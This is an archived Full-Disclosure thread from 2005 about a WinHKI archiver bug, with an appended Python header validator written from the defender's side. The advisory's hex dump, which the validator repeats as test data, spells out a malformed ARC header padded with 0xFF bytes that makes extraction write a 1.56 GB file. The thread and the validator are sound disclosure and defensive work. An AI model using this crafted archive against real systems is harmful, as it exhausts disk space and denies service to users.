Re: [Full-Disclosure] WinHKI - ARC File Extraction of 1KB to 1.56GB

From: Rafel Ivgi (rivgi_at_finjan.com)
Date: 01/11/05

    To: "bipin gautam" <visitbipin@yahoo.com>, <full-disclosure@lists.netsys.com>
    Date: Tue, 11 Jan 2005 17:44:40 +0200
    
    

    The original file wasn't a 1.56 with nulls that were compressed, it was a
    small file with 1024 FF's which was extracted to a
    1.56 of nulls...that is not obvious, that is a bug.

    Rafel Ivgi
    Security Consultant

    ----- Original Message -----
    From: "bipin gautam" <visitbipin@yahoo.com>
    To: <full-disclosure@lists.netsys.com>
    Sent: Saturday, January 08, 2005 11:29 AM
    Subject: Re: [Full-Disclosure] WinHKI - ARC File Extraction of 1KB to 1.56GB

    > that's obvious isn't it... say... if you create a few
    > GB file with null characters, 0X00 and compress
    > it...... that will produce a similar result. such
    > issue is known for any file compress utility for ages.
    >
    >
    > any... software will do the same! try it. and THAT'S
    > OBVIOUS!
    > --- "Rafel Ivgi, The-Insider" <theinsider@012.net.il>
    > wrote:
    >
    >>
    >> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    >>
    >> Application: WinHKI
    >> Vendors: http://www.webtoolmaster.com
    >> Versions: 1.4d
    >> Platforms: Windows
    >> Bug: ARC File Extraction of 1KB to 1.56GB
    >> Exploitation: Local (extract file)
    >> Date: 24 Dec 2004
    >> Author: Rafel Ivgi, The-Insider
    >> E-Mail: the_insider@mail.com
    >> Website: http://theinsider.deep-ice.com
    >>
    >>
    >> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    >>
    >> 1) Introduction
    >> 2) Bugs
    >> 3) The Code
    >>
    >>
    >> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    >>
    >> ===============
    >> 1) Introduction
    >> ===============
    >>
    >> WinHKI is a file archiver which supports: ARC, BH,
    >> CAB, HKI, JAR, LHA, TAR, GZ compressions.
    >>
    >>
    >> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    >>
    >> ======
    >> 2) Bug
    >> ======
    >>
    >> This is a normal CAB compressed file header
    >>
    >> 00000000 1A02 3235 312E 4854 4D00 5E5E 5E5E 5E1B  ..251.HTM.^^^^^.
    >> 00000010 0000 0078 3139 73B5 121B 0000 003C 7363  ...x19s......<sc
    >> 00000020 7269 7074 FB3E 616C 6572 7428 293C 2F73  ript.>alert()</s
    >> 00000030 6372 6970 743E 0D0A 1A00                 cript>....
    >>
    >> By adding after the filename header a certain amount
    >> of chars
    >> and replacing all nulls (00) with FF (in order to
    >> avoid our
    >> long string from being terminated)
    >>
    >> 00000000 1A02 3235 312E 4854 4DFF 5E5E 5E5E 5EFF  ..251.HTM.^^^^^.
    >> 00000010 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000020 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000030 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000040 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000050 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000060 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000070 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000080 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000090 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 000000A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 000000B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 000000C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 000000D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 000000E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 000000F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000100 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000110 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000120 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000130 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000140 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000150 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000160 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000170 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000180 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000190 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 000001A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 000001B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 000001C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 000001D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 000001E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 000001F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000200 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000210 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000220 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000230 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000240 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000250 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000260 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000270 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000280 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000290 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 000002A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 000002B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 000002C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 000002D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 000002E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 000002F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000300 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000310 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000320 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000330 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000340 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000350 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000360 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000370 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000380 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000390 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 000003A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 000003B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 000003C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 000003D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 000003E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 000003F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF  ................
    >> 00000400 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FF1B  ................
    >> 00000410 FFFF FF78 3139 73B5 121B FFFF FF3C 7363  ...x19s......<sc
    >> 00000420 7269 7074 FB3E 616C 6572 7428 293C 2F73  ript.>alert()</s
    >> 00000430 6372 6970 743E 0D0A 1A00                 cript>....
    >>
    >>
    >> HKI will create a 1.56 GIGA BYTE file at the
    >> selected extract location.
    >>
    >>
    >> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    >>
    >> ===========
    >> 3) The Code
    >> ===========
    >>
    >> An online proof of concept can be found at:
    >> http://theinsider.deep-ice.com/hki156gb.ARC
    >>
    >>
    >> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    >>
    >> ---
    >> Rafel Ivgi, The-Insider
    >> http://theinsider.deep-ice.com
    >>
    >> "Scripts and Codes will make me D.O.S , but they
    >> will never HACK me."
    >>
    >> _______________________________________________
    >> Full-Disclosure - We believe in it.
    >> Charter:
    >> http://lists.netsys.com/full-disclosure-charter.html
    >>
    >
    >
    >
    >
    > __________________________________
    > Do you Yahoo!?
    > Yahoo! Mail - Easier than ever with enhanced search. Learn more.
    > http://info.mail.yahoo.com/mail_250
    > _______________________________________________
    > Full-Disclosure - We believe in it.
    > Charter: http://lists.netsys.com/full-disclosure-charter.html

    -----------------------------------------------
    This message was scanned for malicious content and viruses by Finjan Internet Vital Security 1Box(tm)

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
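Added example, not code from the advisory, from WinHKI or from any participant in the thread: a header validator an extractor could run before writing a single byte of output, written from the defender's side of the disagreement above. It reads the 29-byte SEA ARC member header that the quoted hex dump shows (0x1A marker, method byte, 13-byte NUL-terminated name, 32-bit compressed size, date, time, CRC-16, 32-bit original size) with fixed field widths instead of scanning for a string terminator, so the FF-filled name in the second dump is rejected at the name field rather than being allowed to run into the size fields. The benign and malformed samples are transcribed from the two dumps in the advisory; the 64 MiB output cap, the 100:1 ratio cap, and the third "inflated" sample (a well-formed header that merely claims a 1.56 GB original size) are assumptions constructed for the example.

```python
import struct
from dataclasses import dataclass

# SEA ARC member header, the 29-byte form used by every method from 2 upward:
#   u8 marker 0x1A | u8 method | 13-byte NUL-terminated filename |
#   u32 compressed size | u16 date | u16 time | u16 CRC-16 | u32 original size
HEADER = struct.Struct("<BB13sIHHHI")

# Extraction policy. Assumed values for this example, not WinHKI's.
MAX_OUTPUT_BYTES = 64 * 1024 * 1024   # largest member we are willing to write
MAX_RATIO = 100                        # largest expansion a compressed member may claim


class ArcHeaderError(ValueError):
    """Raised when a header is malformed or violates the extraction policy."""


@dataclass
class ArcMember:
    name: str
    method: int
    compressed_size: int
    original_size: int
    data_offset: int


def parse_arc_header(buf: bytes, offset: int = 0) -> ArcMember:
    """Decode one member header using fixed field widths, never a string scan."""
    if len(buf) - offset < HEADER.size:
        raise ArcHeaderError(f"truncated member header at offset {offset}")
    marker, method, raw_name, csize, _date, _time, _crc, osize = HEADER.unpack_from(buf, offset)
    if marker != 0x1A:
        raise ArcHeaderError(f"bad marker byte 0x{marker:02X} at offset {offset}")
    if not 2 <= method <= 9:
        raise ArcHeaderError(f"unsupported compression method {method}")
    # The name must terminate inside its 13-byte field. A name with no NUL is
    # what lets a strlen-style reader run off the field into the size fields.
    nul = raw_name.find(b"\x00")
    if nul < 0:
        raise ArcHeaderError("filename field has no NUL terminator")
    name_bytes = raw_name[:nul]
    if not name_bytes or not all(0x20 <= b < 0x7F for b in name_bytes):
        raise ArcHeaderError("filename is empty or contains non-printable bytes")
    name = name_bytes.decode("ascii")
    if any(sep in name for sep in ("/", "\\", ":", "..")):
        raise ArcHeaderError(f"filename {name!r} carries a path component")
    return ArcMember(name, method, csize, osize, offset + HEADER.size)


def check_member(buf: bytes, offset: int = 0) -> ArcMember:
    """Parse a header and reject sizes that cannot be honest or are too large."""
    m = parse_arc_header(buf, offset)
    remaining = len(buf) - m.data_offset
    if m.compressed_size > remaining:
        raise ArcHeaderError(f"compressed size {m.compressed_size} exceeds the {remaining} bytes left")
    if m.original_size > MAX_OUTPUT_BYTES:
        raise ArcHeaderError(f"declared original size {m.original_size} exceeds the policy cap")
    if m.method == 2 and m.original_size != m.compressed_size:
        raise ArcHeaderError("stored member declares different compressed and original sizes")
    if m.original_size > m.compressed_size * MAX_RATIO:
        raise ArcHeaderError("declared expansion ratio exceeds the policy cap")
    return m


def validate_archive(buf: bytes) -> list:
    """Walk every member up to the 0x1A 0x00 end marker, enforcing the policy."""
    members, offset, declared_total = [], 0, 0
    while True:
        if len(buf) - offset < 2:
            raise ArcHeaderError("archive ends without an end-of-archive marker")
        if buf[offset] == 0x1A and buf[offset + 1] == 0x00:
            return members
        m = check_member(buf, offset)
        declared_total += m.original_size
        if declared_total > MAX_OUTPUT_BYTES:
            raise ArcHeaderError("total declared output exceeds the policy cap")
        members.append(m)
        offset = m.data_offset + m.compressed_size


def is_safe(buf: bytes):
    """Convenience wrapper: (True, summary) or (False, reason)."""
    try:
        members = validate_archive(buf)
    except ArcHeaderError as exc:
        return False, str(exc)
    return True, f"{len(members)} member(s) within policy"


# Sample inputs transcribed from the advisory's two hex dumps.
BENIGN_ARC = bytes.fromhex(
    "1A02 3235 312E 4854 4D00 5E5E 5E5E 5E1B 0000 0078 3139 73B5 121B 0000 00"
    "3C73 6372 6970 74FB 3E61 6C65 7274 2829 3C2F 7363 7269 7074 3E0D 0A1A 00"
)
MALFORMED_ARC = (
    bytes.fromhex("1A02 3235 312E 4854 4DFF 5E5E 5E5E 5E")
    + b"\xFF" * 1024
    + bytes.fromhex("1BFF FFFF 7831 3973 B512 1BFF FFFF 3C73 6372 6970 74FB 3E61"
                    "6C65 7274 2829 3C2F 7363 7269 7074 3E0D 0A1A 00")
)
# Constructed variant (assumption): a well-formed "crunched" header that merely
# claims a 1.56 GB original size, to show the size cap firing on its own.
INFLATED_ARC = bytes([0x1A, 0x08]) + BENIGN_ARC[2:25] + struct.pack("<I", 1_560_000_000) + BENIGN_ARC[29:]

if __name__ == "__main__":
    for label, arc in (("benign", BENIGN_ARC), ("malformed", MALFORMED_ARC), ("inflated", INFLATED_ARC)):
        print(label, is_safe(arc))
```

The point of the fixed-width read is that the name field's contents can never change where the size fields are looked up; the point of checking the declared compressed size against the bytes actually left in the file is that a size field which the archive cannot physically back is refuted before any allocation or write, regardless of what the original-size field claims.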


